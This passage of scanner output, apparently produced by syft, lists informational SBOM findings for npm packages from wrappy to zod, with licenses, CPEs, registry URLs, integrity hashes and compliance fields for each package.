discovered: wrappy 1.0.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 3d054461229ae629 name: wrappy version: 1.0.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:wrappy:wrappy:1.0.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/wrappy@1.0.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz integrity: sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: d249fddb72dddcbc ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: ws 8.18.3' title: ws 8.18.3 description: 'Package discovered: ws 8.18.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 20d4f853542f41c9 name: ws version: 8.18.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:ws_project:ws:8.18.3:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/ws@8.18.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/ws/-/ws-8.18.3.tgz integrity: sha512-PEIGCY5tSlUt50cqyMXfCzX+oOPqN0vuGqWzbcJ2xvnkzkq46oOpz7dQaTDBdfICb4N14+GARUDw2XV2N4tvzg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: c71da5915aeb2537 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: xmlbuilder 13.0.2' title: xmlbuilder 13.0.2 description: 'Package discovered: xmlbuilder 13.0.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 0872acd31442749a name: xmlbuilder version: 13.0.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:xmlbuilder:xmlbuilder:13.0.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/xmlbuilder@13.0.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/xmlbuilder/-/xmlbuilder-13.0.2.tgz integrity: sha512-Eux0i2QdDYKbdbA6AM6xE4m6ZTZr4G4xF9kahI2ukSEMCzwce2eX9WlTI5J3s+NU7hpasFsr8hWIONae7LluAQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: fd4707cd0572bee3 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: xmlhttprequest-ssl 2.1.2' title: xmlhttprequest-ssl 2.1.2 description: 'Package discovered: xmlhttprequest-ssl 2.1.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 9551f10f27f0ee2d name: xmlhttprequest-ssl version: 2.1.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:xmlhttprequest-ssl:xmlhttprequest-ssl:2.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:xmlhttprequest-ssl:xmlhttprequest_ssl:2.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:xmlhttprequest_ssl:xmlhttprequest-ssl:2.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:xmlhttprequest_ssl:xmlhttprequest_ssl:2.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:xmlhttprequest:xmlhttprequest-ssl:2.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:xmlhttprequest:xmlhttprequest_ssl:2.1.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/xmlhttprequest-ssl@2.1.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/xmlhttprequest-ssl/-/xmlhttprequest-ssl-2.1.2.tgz integrity: sha512-TEU+nJVUUnA4CYJFLvK5X9AOeH4KvDvhIfm0vV1GaQRtchnG0hgK5p8hw/xjv8cunWYCsiPCSDzObPyhEwq3KQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: a5a624f94f45bfc0 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: xtend 4.0.2' title: xtend 4.0.2 description: 'Package discovered: xtend 4.0.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 6f2d4b5e4aa5bc10 name: xtend version: 4.0.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:xtend:xtend:4.0.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/xtend@4.0.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/xtend/-/xtend-4.0.2.tgz integrity: sha512-LKYU1iAXJXUgAXn9URjiu+MWhyUXHsvfp7mcuYm9dSUKK0/CjtrUwFAxD82/mCWbtLsGjFIad0wIsod4zrTAEQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 5d318a2cd2d1309b ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: y18n 4.0.3' title: y18n 4.0.3 description: 'Package discovered: y18n 4.0.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: f92fb588898c98cc name: y18n version: 4.0.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:y18n_project:y18n:4.0.3:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/y18n@4.0.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/y18n/-/y18n-4.0.3.tgz integrity: sha512-JKhqTOwSrqNA1NY5lSztJ1GrBiUodLMmIZuLiDaMRJ+itFd+ABVE8XBjOvIWL+rSqNDC74LCSFmlb/U4UZ4hJQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: ff7837262c7a0506 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: y18n 5.0.8' title: y18n 5.0.8 description: 'Package discovered: y18n 5.0.8' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 17090a29739955b3 name: y18n version: 5.0.8 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:y18n_project:y18n:5.0.8:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/y18n@5.0.8 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz integrity: sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 20985a40c61069a1 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: yallist 4.0.0' title: yallist 4.0.0 description: 'Package discovered: yallist 4.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: c85ae4ebdc6284ae name: yallist version: 4.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:yallist:yallist:4.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/yallist@4.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz integrity: sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 71c51c3c7b12c140 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: yargs 15.4.1' title: yargs 15.4.1 description: 'Package discovered: yargs 15.4.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: bbb181fdab2eb6da name: yargs version: 15.4.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:yargs:yargs:15.4.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/yargs@15.4.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/yargs/-/yargs-15.4.1.tgz integrity: sha512-aePbxDmcYW++PaqBsJ+HYUFwCdv4LVvdnhBy78E57PIor8/OVvhMrADFFEDh8DHDFRv/O9i3lPhsENjO7QX0+A== dependencies: cliui: ^6.0.0 decamelize: ^1.2.0 find-up: ^4.1.0 get-caller-file: ^2.0.1 require-directory: ^2.1.1 require-main-filename: ^2.0.0 set-blocking: ^2.0.0 string-width: ^4.2.0 which-module: ^2.0.0 y18n: ^4.0.0 yargs-parser: ^18.1.2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 96fe97c2b6d8795a ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: yargs 17.7.2' title: yargs 17.7.2 description: 'Package discovered: yargs 17.7.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: c2726c8cb18290f2 name: yargs version: 17.7.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:yargs:yargs:17.7.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/yargs@17.7.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz integrity: sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w== dependencies: cliui: ^8.0.1 escalade: ^3.1.1 get-caller-file: ^2.0.5 require-directory: ^2.1.1 string-width: ^4.2.3 y18n: ^5.0.5 yargs-parser: ^21.1.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: ee09b685d8bedc8a ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: yargs-parser 18.1.3' title: yargs-parser 18.1.3 description: 'Package discovered: yargs-parser 18.1.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 385fd2e9c795bcc7 name: yargs-parser version: 18.1.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:yargs:yargs-parser:18.1.3:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/yargs-parser@18.1.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/yargs-parser/-/yargs-parser-18.1.3.tgz integrity: sha512-o50j0JeToy/4K6OZcaQmW6lyXXKhq7csREXcDwk2omFPJEwUNOVtJKvmDr9EI1fAJZUyZcRF7kxGBWmRXudrCQ== dependencies: camelcase: ^5.0.0 decamelize: ^1.2.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: a4ff6cebec5b0be4 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: yargs-parser 21.1.1' title: yargs-parser 21.1.1 description: 'Package discovered: yargs-parser 21.1.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 95c25d265eed6eaf name: yargs-parser version: 21.1.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:yargs:yargs-parser:21.1.1:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/yargs-parser@21.1.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz integrity: sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 14bd34194369a5c5 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: yocto-queue 0.1.0' title: yocto-queue 0.1.0 description: 'Package discovered: yocto-queue 0.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 813268dedfe3539f name: yocto-queue version: 0.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:yocto-queue:yocto-queue:0.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:yocto-queue:yocto_queue:0.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:yocto_queue:yocto-queue:0.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:yocto_queue:yocto_queue:0.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:yocto:yocto-queue:0.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:yocto:yocto_queue:0.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/yocto-queue@0.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz integrity: sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 16bb4d5a9e7dc8d3 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: yoga-layout 2.0.1' title: yoga-layout 2.0.1 description: 'Package discovered: yoga-layout 2.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 579e04e050802ec1 name: yoga-layout version: 2.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:yoga-layout:yoga-layout:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:yoga-layout:yoga_layout:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:yoga_layout:yoga-layout:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:yoga_layout:yoga_layout:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:yoga:yoga-layout:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:yoga:yoga_layout:2.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/yoga-layout@2.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/yoga-layout/-/yoga-layout-2.0.1.tgz integrity: sha512-tT/oChyDXelLo2A+UVnlW9GU7CsvFMaEnd9kVFsaiCQonFAXd3xrHhkLYu+suwwosrAEQ746xBU+HvYtm1Zs2Q== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 6ac3ad6fac7a8b51 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: zod 3.25.76' title: zod 3.25.76 description: 'Package discovered: zod 3.25.76' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: c30d59c73bdda635 name: zod version: 3.25.76 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:zod:zod:3.25.76:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/zod@3.25.76 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/zod/-/zod-3.25.76.tgz integrity: sha512-gzUt/qt81nXsFGKIFcC3YnfEAx5NkunCfnDlvuBSSFS02bcXu4Lmea0AFIUwbLWxWPx3d9p8S5QoaujKcNQxcQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0